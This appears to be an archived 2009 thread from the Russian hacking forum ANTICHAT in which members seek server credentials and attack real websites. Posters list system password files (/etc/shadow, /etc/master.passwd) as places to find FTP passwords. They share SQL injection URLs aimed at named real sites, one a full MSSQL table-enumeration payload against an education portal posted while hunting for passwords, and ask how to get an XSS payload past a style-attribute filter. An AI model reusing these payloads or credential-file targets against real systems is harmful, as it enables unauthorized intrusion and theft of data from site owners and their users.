ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
04.02.2009, 06:19
|
|
Постоянный
Регистрация: 21.08.2008
Сообщений: 302
Провел на форуме:
458686
Репутация:
-25
|
|
Вот конфигурация сервера:
Apache/2.0.59 (Unix) DAV/2 PHP/5.0.4 mod_ssl/2.0.59 OpenSSL/0.9.8h Sun-ONE-ASP/4.0.2
Вопрос:
Где лежит файл с кодами от ftp???
|
|
|
04.02.2009, 06:29
|
|
Постоянный
Регистрация: 24.05.2008
Сообщений: 589
Провел на форуме:
3629857
Репутация:
504
|
|
Сообщение от geforce
Вот конфигурация сервера:
Apache/2.0.59 (Unix) DAV/2 PHP/5.0.4 mod_ssl/2.0.59 OpenSSL/0.9.8h Sun-ONE-ASP/4.0.2
Вопрос:
Где лежит файл с кодами от ftp???
а ftp-сервер там какой?
|
|
|
|
04.02.2009, 12:38
|
|
Постоянный
Регистрация: 18.09.2006
Сообщений: 867
Провел на форуме:
2805813
Репутация:
1396
|
|
/etc/shadow
/etc/master.passwd
/etc/system/passwd
/etc/security/passwd
мб еще в БД лежат.
зависит не только от версии апача и пхп и прикруток, а от ОС и, как заметил gisTy - фтп сервера(хотя, скорее всего, пох на фтп-демона =) )
|
|
|
|
04.02.2009, 15:50
|
|
Познавший АНТИЧАТ
Регистрация: 12.05.2007
Сообщений: 1,235
Провел на форуме:
2238549
Репутация:
1318
|
|
Если прав на чтение той базы у текущего юзера нету, то никак ты не прочитаешь данные из той базы...
|
|
|
|
04.02.2009, 15:50
|
|
Познающий
Регистрация: 15.11.2008
Сообщений: 32
Провел на форуме:
306778
Репутация:
22
|
|
Нашол вот чё: http://www.bnti.ru/index.asp?tbl=1' OR  '1'='1%27
Что от сюда полезное???
|
|
|
|
04.02.2009, 16:15
|
|
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
Провел на форуме:
5386281
Репутация:
1177
|
|
Сообщение от IIAPTUZAH
Нашол вот чё: http://www.bnti.ru/index.asp?tbl=1' OR  '1'='1%27
Что от сюда полезное???
А что ты тут нашел? o_0
|
|
|
|
04.02.2009, 16:27
|
|
Познающий
Регистрация: 15.11.2008
Сообщений: 32
Провел на форуме:
306778
Репутация:
22
|
|
Блин как так 2 раз незаходит  Лан хоть скрин есть  Он выдал мне на страницу инфы .... |
|
|
|
04.02.2009, 16:35
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534
Репутация:
2731
|
|
Если разэнкодить символы 1' OR '1&# x27;='1%27 будет
|
|
|
|
04.02.2009, 16:42
|
|
Постоянный
Регистрация: 07.03.2008
Сообщений: 479
Провел на форуме:
791766
Репутация:
61
|
|
Вопрос по XSS
Возсожно ли организовать уязвимость в поле color: у style ?
Фильтр " не пропускает, а если сделать так \"\ то получается такое
PHP код:
<span style="color:\"">1</span>
|
|
|
|
04.02.2009, 20:43
|
|
Познающий
Регистрация: 15.11.2008
Сообщений: 32
Провел на форуме:
306778
Репутация:
22
|
|
Всем здрастье Вот перебрал всю таблицу а пасы ненашол
http://ts.edu.ru/schools/region/6/?town=%27+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFOR MATION_SCHEMA.TABLES+WHERE+TABLE_NAME+NOT+IN+(%27% 20DBSchool%27,%27school_Need%27,%27school_News%27, %27school_Photo%27,%27school_Teachers%27,%27School _Leavers%27,%27index_Epigraph%27,%27index_bgImage% 27,%27site_news%27,%27SchoolTypes%27,%27blag_News% 27,%27SchoolForms%27,%27vote_Main%27,%27SchoolVids %27,%27v_FullSchoolInfo%27,%27vote_Answers%27,%27R egions%27,%27TownTypes%27,%27school_Main%27,%27%D0 %E0%F1%EF%F0%E5%E4%E5%EB%E5%ED%E8%E5%20%F8%EA%EE%E B%20%EF%EE%20%F0%E5%E3%E8%EE%ED%E0%EC%27,%27Images %27,%27tmpImages%27,%27HelpTypes%27,%27Forums%27,% 27school_History%27,%27sponsor_offers%27,%27Countr ies%27,%27Educations%27,%27Users%27,%27syssegments %27,%27sysconstraints%27,%27Admin_schools%27,%27dt properties%27,%27Admin_Site%27,%27v_School_Need_Fu ll%27,%27v_Sponsor_Offers_Full%27))-- |
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид